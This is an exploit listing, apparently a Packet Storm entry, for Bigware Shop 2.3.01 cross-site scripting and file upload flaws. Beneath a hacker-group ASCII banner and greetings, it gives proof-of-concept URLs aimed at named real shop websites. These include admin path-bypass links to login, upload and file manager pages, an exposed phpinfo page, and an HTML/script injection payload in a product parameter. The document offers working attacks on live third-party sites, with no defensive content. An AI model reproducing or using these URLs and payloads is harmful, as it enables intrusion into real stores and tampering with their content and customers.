Bigware Shop 2.3.01 Cross Site Scripting / File Upload

2015-12-25T00:00:00
ID PACKETSTORM:135074
Type packetstorm
Reporter indoushka
Modified 2015-12-25T00:00:00

Description

                                        
                                            `1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0   
0 _ __ __ __ 1   
1 /' \ __ /'__`\ /\ \__ /'__`\ 0   
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1   
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0   
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1   
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0   
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1   
1 \ \____/ >> Exploit database separated by exploit 0   
0 \/___/ type (local, remote, DoS, etc.) 1   
1 1   
0 [+] Site : http://0day.today 0   
1 [+] Support e-mail : submit[at]inj3ct0r.com 1   
0 0   
1 #################################### 1   
0 I'm indoushka member from Inj3ct0r Team 1   
1 #################################### 0   
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
| # Title : Bigware Shop v2.3.01 Multi Vulnerability  
| # Author : indoushka  
| # email : indoushka4ever@gmail.com  
| # Tested on: windows 8.1 Français V.(Pro)  
| # Vendor : http://www.bigware.de/  
========================================================================  
  
Poc :  
  
login ifo :   
  
http://schuhelang.de/Shop/configmain/main_bigware_43.php/main_bigware_79.php  
  
Xss /Html inject :  
  
http://newtopia-shop.de//main_bigware_39.php?bigPfad=&items_id=67%27%22%28%29%26%25%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E  
  
upload :  
  
http://schuhelang.de/Shop/configmain/main_bigware_100.php/main_bigware_79.php  
  
php info :  
  
http://www.erzgebirgsschnitzer.de/shop1/phpinfo.php  
  
File Manager  
  
http://schuhelang.de/Shop/configmain/main_bigware_40.php/main_bigware_79.php?action=upload  
  
Greetz :   
jericho http://attrition.org & http://www.osvdb.org/ * http://packetstormsecurity.com   
Hussin-X *D4NB4R* KnocKout * https://www.corelan.be  
---------------------------------------------------------------------------------------  
`